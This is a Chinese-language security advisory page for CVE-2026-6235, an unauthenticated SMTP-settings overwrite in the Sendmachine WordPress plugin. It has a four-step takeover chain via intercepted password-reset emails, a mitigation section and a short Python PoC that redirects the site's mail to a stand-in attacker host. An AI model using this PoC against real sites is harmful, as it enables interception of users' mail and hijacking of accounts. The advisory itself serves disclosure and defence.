IPBUF安全漏洞报告
English
CVE-2026-6235 CVSS 9.8 严重

CVE-2026-6235 WordPress Sendmachine插件权限绕过漏洞

披露日期: 2026-04-22
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-6235
漏洞类型
权限绕过
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Sendmachine for WordPress Plugin

相关标签

权限绕过WordPressCVE-2026-6235SMTP劫持未授权访问

漏洞概述

WordPress的Sendmachine插件在所有版本至1.0.20中存在严重的权限绕过漏洞。由于插件在`manage_admin_requests`函数中未正确验证用户权限,未认证攻击者可覆盖SMTP配置。此漏洞允许攻击者拦截站点所有出站邮件,包含敏感的密码重置链接,进而威胁账户安全并窃取数据。

技术细节

该漏洞源于Sendmachine插件处理管理请求时的权限校验逻辑缺失。受影响版本的代码在`sendmachine_wp_admin.php`和`sendmachine_email_manager.php`中实现`manage_admin_requests`功能时,未对调用者是否具备管理员权限进行有效验证。正常情况下,修改SMTP配置需要管理员权限,但漏洞允许未经身份验证的匿名用户直接调用该接口。攻击者只需向WordPress站点发送特制的POST数据包,即可覆盖原有的SMTP服务器地址、端口及账户凭证。一旦配置被篡改,系统所有外发邮件(如用户注册通知、密码重置邮件)均会被发送至攻击者控制的服务器。结合密码重置功能,攻击者可截获重置令牌,进而重置管理员或其他用户密码,完全接管网站账户。

攻击链分析

STEP 1
侦察
攻击者识别目标站点是否安装了Sendmachine for WordPress插件,并确认版本在1.0.20及以下。
STEP 2
利用
攻击者向`/wp-admin/admin-ajax.php`发送特制的POST请求,调用`manage_admin_requests`函数,利用权限绕过漏洞修改SMTP服务器配置。
STEP 3
拦截
攻击者触发站点的密码重置功能,由于SMTP配置已被篡改,包含重置链接的邮件被发送至攻击者控制的服务器。
STEP 4
接管
攻击者从截获的邮件中获取密码重置令牌,重置管理员密码,从而完全接管WordPress网站。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2026-6235 PoC: Sendmachine Plugin Authorization Bypass # This script demonstrates how an unauthenticated user can update SMTP settings. target_url = "http://example.com/wp-admin/admin-ajax.php" attacker_smtp_host = "smtp.evil.com" attacker_smtp_port = "25" attacker_email = "[email protected]" # Payload to overwrite SMTP configuration # Note: The specific parameter names might vary based on exact plugin implementation payload = { "action": "manage_admin_requests", "method": "save_smtp_config", "host": attacker_smtp_host, "port": attacker_smtp_port, "user": attacker_email, "pass": "password123" } try: response = requests.post(target_url, data=payload) if response.status_code == 200: print("[+] SMTP configuration potentially overwritten.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Sendmachine for WordPress <= 1.0.20

防御指南

临时缓解措施
在未升级插件前,建议暂时禁用Sendmachine插件以阻断攻击面。同时,管理员应检查当前的SMTP配置是否已被篡改,确保邮件服务器地址指向合法可信的服务商。若发现异常,需立即修改管理员密码并通知用户警惕重置邮件劫持风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表